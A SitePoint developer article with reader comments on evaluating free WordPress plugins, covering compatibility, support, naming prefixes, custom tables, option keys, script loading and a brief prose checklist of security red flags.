A Developer’s Guide to Using Free WordPress Plugins

By Rakhitha Nimesh
We teamed up with SiteGround
To bring you the latest from the web and tried-and-true hosting, recommended for designers and developers. SitePoint Readers Get Up To 65% OFF Now

WordPress, the most popular content management system in the world, is built on a structure that allows users to supplement core functionality with themes that provide visual designs and plugins that provide specific additional functionality.

There are now over 20,000 plugins in the official WordPress repository, all of them free to use. Anyone can upload a plugin, and if it is good it is likely to become very popular. This does, however, carry some risks. What if the plugin is poorly coded and breaks down? What if it’s incompatible with other plugins, the theme being used, or even core functionality? What if – heaven forbid – it has been deliberately set up to place malicious code on your website?

Should Developers Use Free Plugins?

The answer to this question depends upon your personal preference and status of your project. Personally, I prefer to write my own plugins whenever possible. In real life, that isn’t always possible: client requirements, deadlines, capabilities of other team members etc might not allow for that. In such situations, developers understandably consider whether a free plugin can provide the required functionalities.

It can be easier, faster and more cost-effective for even an experience developer to use a freely available plugin. There is nothing wrong with this, but the developer needs to be aware that there are some considerations that should be taken into account. Once you decide to work with free plugins, you have to consider various factors in choosing the right plugin in order to prevent unexpected behaviour.

Basics for Choosing WordPress Plugins

There is a group of factors that apply to anyone considering using a free WordPress plugin, whether they are site owners, amateur designers or professional developers.

Versions and Compatibility

version check

Version details are placed at the top right corner of every WordPress plugin detail page. Check that you are using the latest version of the plugin and that it is compatible with the version of WordPress you are using. If a plugin has been updated recently, it’s an indicator that the author is keeping up with compatibility requirements.

Downloads, Ratings and Reviews


A high number of downloads and good user ratings indicate that users are not having problems using this plugin. Also make sure to check the reviews section to find out why users like this plugin and what difficulties they may have found in using this plugin.

Documentation and Support


Plugins may be created and distributed by large development agencies or a solo operator who had a good idea. Either way, the end user and you as the developer should look for clear, accurate and up-to-date documentation as well as a means of obtaining support from the plugin developer and/or a the community of people who use the plugin. A larger agency may have a website that provides knowledgebase, a Frequently Asked Questions page, a ticketing system and/or a forum where users can crowdsource solutions to problems.

Smaller or solo plugin developers may provide a blog that covers much the same set of purposes, preferably including a way of contacting the plugin author direct.

A nontechnical user such as an amateur setting up their own website may consider it worth taking the risk of using a plugin that does not have adequate documentation and support. A professional developer working for a client never should: the consequences could be disastrous for your reputation.

The Developer’s Perspective

The factors mentioned in the previous section apply to anyone considering using a free WordPress plugin. However, developers come equipped with skills and information not available to the everyday mortal and they thus carry a greater level of responsibility to check things ordinary users may not even know about.

Test in a Non-Crucial Environment

Never test new plugins in your production environment or any other WordPress installation that is important to you. Instead, try keeping a separate WordPress installation for testing purposes with the default themes and default plugins.

Keep your test environment tidy, so you don’t end up with lots of unused plugins that may conflict with each other. Make your testing environment mimic your production environment as closely as possible. Activate the chosen plugin, test it properly and then remove it before testing the next plugin.

Given that everything works as expected, it’s time to dig into the code and see whether the chosen plugin is suitable to use in your actual applications.

Function and Class Naming Conventions

Anyone can upload plugins to WordPress plugin repository as long as it meets the basic plugin submission guidelines. That creates the chance that two or more plugin developers used the same functions and class names, resulting in conflicts at runtime.

Such conflicts can be avoided by prefixing plugin functions and classes with a plugin related keyword. As a user of such plugins, you should be checking the function names to make sure they are unique at least within your application.

Consider the following function declarations.

Not Recommended

function get_key() {



function akismet_get_key() {


There is no guarantee that prefixing will completely prevent conflicts, but using unique prefixes definitely reduces the chances of having duplicate functions.

Plugin Specific Tables

WordPress is flexible enough to create a wide range of web applications using its default table structure. But sometimes we need additional custom tables to provide plugin specific functionalities.

These custom tables are generally created on activation of the plugin. Most developers won’t remove these custom tables on plugin deactivation. Therefore whenever you decide to get rid of an existing plugin, you have to remove the tables from database manually to prevent unnecessary expansion of databases.

Custom databases should also include the prefix in the config file without hard coding the table names. Consider the following code for proper table naming conventions.

Not Recommended

$portfolios = $wpdb->get_results( "SELECT * FROM wp_portfolio");


$portfolios = $wpdb->get_results( "SELECT * FROM “.$wpdb->prefix . portfolio");

Custom sql queries are needed to access these tables since WordPress does not provide built in methods. WordPress functions used to access data from tables are optimized for better performance. So with custom tables you might have slight performance decreases as they are not optimized.

Check whether your plugin uses custom tables and make sure to consider the above guidelines when choosing a plugin.

Security and Spamming

Security is a big concern in using free plugins. We don’t exactly know the quality of the codes and what developers are doing inside these codes. Therefore it’s important to check whether a plugin contains security holes or spamming content.

  • First we need to look for data validation. If the user input data is not properly validated and sanitized, anyone will be able to enter data causing damage to our sites.
  • Then we need to check whether a plugin accesses sensitive data like configuration details and user details, and whether it sends them to third party applications.
  • Also we need to check whether a plugin sends emails to unknown email addresses with data from your database or files.
  • Some developers insert spamming content like social profile links of developer, websites, affiliate ads and links with the plugin generated output. Make sure to remove such things from the code or avoid using such plugins.

These are only few of the security concerns that plugins will have in its code. When you find something malicious in plugin codes, make sure to share it with the community to prevent other users from using such plugins.

Plugin Specific Options

WordPress plugin developers use options to retain settings and other important information related to plugins. These options are stored in the default wp_options table.

Plugins that use the same keys for its options are hard to manage without conflicts, similar to the issue with function names and classes names. It’s worse in this scenario since two duplicate option keys may not generate visible errors but be in conflict. It can be extremely difficult to figure out the exact issue.

Consider following codes for creating plugin options.

Not Recommended

update_option( 'xml', $opt );

update_option( 'social', $opt );


update_option( 'wpseo_xml', $opt );

update_option( 'wpseo_social', $opt );

Unfortunately, the only solution I know of to this problem is to manually check whether a plugin uses prefixes for its option keys.

Direct Loading of CSS and JavaScript

Inexperienced WordPress developers tend to load their CSS and JavaScripts files directly inside the plugin. That can cause problems.

  • Duplicate CSS and JavaScript files
  • Increased page loading time and possibility of breaking the code.
  • Includes files everywhere inside the page

On the other hand, experienced developers will use wp_enqueue_scripts action to load the files. It checks whether a library is already loaded and has any dependencies before including it in the page, preventing any duplicates.

Consider the following codes for including scripts and styles.

Not Recommended

function include_scripts_styles(){

    echo ‘<script type="text/javascript" src="jquery.js"></script>’;

    echo ‘<link type="text/css" rel="stylesheet" href="styles.css" />‘;



add_action('wp_enqueue_scripts', 'wppc_scripts');
function wppc_scripts() {
    wp_register_style('sample_style', plugins_url('styles.css', __FILE__));

So, you should prefer to use plugins with more organized scripts and styles loading section to prevent maintenance issues.


Everything included in this article here is based on my own experiences with WordPress development. I’m not aware of anyone, from committed amateur to experienced professional, who has the required experience of every available plugin and how they will operate in every possible production environment. That’s probably not even possible.

What is possible is to draw upon your professional knowledge of how code works to give yourself and your client the best possible chance to avoid issues with free WordPress plugins. There is an added responsibility to share your knowledge with others. If you detect an issue that may affect how others make use of a plugin, let the world know. Probably the best way is through the avenues provided by the plugin developer, but you should also consider just contacting the plugin author and letting them know what you found out.

I invite WordPress developers to join this conversation and include their personal experiences in using free plugins. Whate are your personal pros and cons? Have you worked out your own procedural guidelines and safety practices? Do you have rules about plugins you will or won’t use?

I look forward to your comments and suggestions.

We teamed up with SiteGround
To bring you the latest from the web and tried-and-true hosting, recommended for designers and developers. SitePoint Readers Get Up To 65% OFF Now
  • Although plugins might not always work exactly the way you want them, many of them are very powerful and reliable and save you weeks if not months developing something similar. I think it’s usually best to test the plugins internally before pushing live or thinking about creating your own. It also gives you a better idea of what you would do the same or differently yourself.

    • Hello

      You are absolutely right. It saves us lots of time. But writing our own plugins gives us more control. I develop plugins when I have long term plans of using them in all the projects.

      So do you look inside the code for choosing free plugins? If you do, what would be the first thing you are going to look for ?

      Let me know.

      Thank you very much.

  • Hi, pretty good article here, thanx for starting up the conversation again. I would comment that your recommended method for plugin options should go one step further and in fact place your options into an array. Both themes and plugins often store many dozens of options each, they all need to be placed into a single array to reduce the need to connect with the database. One call to get and one to set all of your plugin options.

    • Hello Daiv

      Thank you very much for your suggestions and interest in my article.

      Good point you made with plugin options. We should definitely insert common options into an array an save it as single entry in options table without using single record for every option.

      In the example I have used the options of WP SEO plugin which uses the same technique. XML details are inserted into a single option with array of values and another array of values for Social details making it easy to use.

      I would like to ask the things you might like to look in plugin code before actually using ?

      Let me know.

  • OK right off the bat I don’t write plugin code, I do us wp themes and make it a habit to not use special home made plugins because you just don’t know what changes are going to be made from year to year. Yes some of the plugins have been bought out or dropped off the face of the earth, but in most cases if you choose professional plugins (like Gravity forms) and themes (like genesis) you don’t have to worry so much about support or having to change your preferences in the next several years.

    I’ve been asked to help on several sites that are stuck on an old version of wp because they can’t update their special plugin or theme. The company can’t find the designer or don’t have the same relationship with the designer.

    I think my concerns are more about using a theme or plugin that wont be supported in the future.

    • Hello Jack

      Thank you very much for the suggestions.

      I agree with you regarding everything you said. It’s about choosing the right plugins. Using top plugins in the wp directory is not a problem since they have an active community and will continue to develop in the future.

      Considerations need to be made when you try to use new plugin which has not much information about its future or the developer.

      Do you look inside plugin code before choosing plugins? and have you ever found a plugins which generates spam content or potential security threats?

      Like to hear form you.

  • nice pointthere. but since am a newbie to programming (PHP) i dnt have any option than to succum to plugins. Thogh off topic, pls help with resources on how i can learn PHP.

    • You should stop by PHPMaster. While many of the folks there are advanced in their knowledge, they’re also pretty friendly and could point you in the right direction.

    • Hi collizo4sky

      Thank you very much for taking time to comment.

      As Ricky suggested PHPMaster is the best resource for learning PHP. I also write there. So I definitely know that writeers and developers of PHPMaster will guide to the process of learning PHP.

  • Phpmaster seems good. But my problem with it is, it contain random php tutorial. Since am a newbie (though i know basic php syntax and coding) and willing to learn, sir nimesh, i would like you to help me with some good website or resources where i could start. If possible can u tell me how you became a PRO? and how u learnt it. Pls

    • hi

      I understand your problem. You need to have basic knowledge in PHP to understand the tutorials in PHPMaster. I personally started with w3schools tutorial for learning the basics of PHP. Then I stared developing small web sites with PHP. I believe practically doing something is better than learning theories.

      Once you get the basic knowledge, I suggest you to look for basic practical tutorials which builds something. there are plenty of such tutorials. I don’t consider myself as a PRO yet. There is lots of things to learn.

      Let me know if it helps and if you need further guidance.

  • I have used free plugins, however, I have had some pretty bad experiences with some of them crashing during a WordPress update, and then on top of it, finding out there has been no updates or support for the plugin usually leaves me scrambling to find a replacement.

    Keep free plugins to a minimum if you can and ensure they are supported. Great info, Thanks!

    • Hello Jeff

      Thank you very much for the interest in my article and taking time to provide your own experiences.

      Its always better to keep only the necessary plugins to avoid conflicts.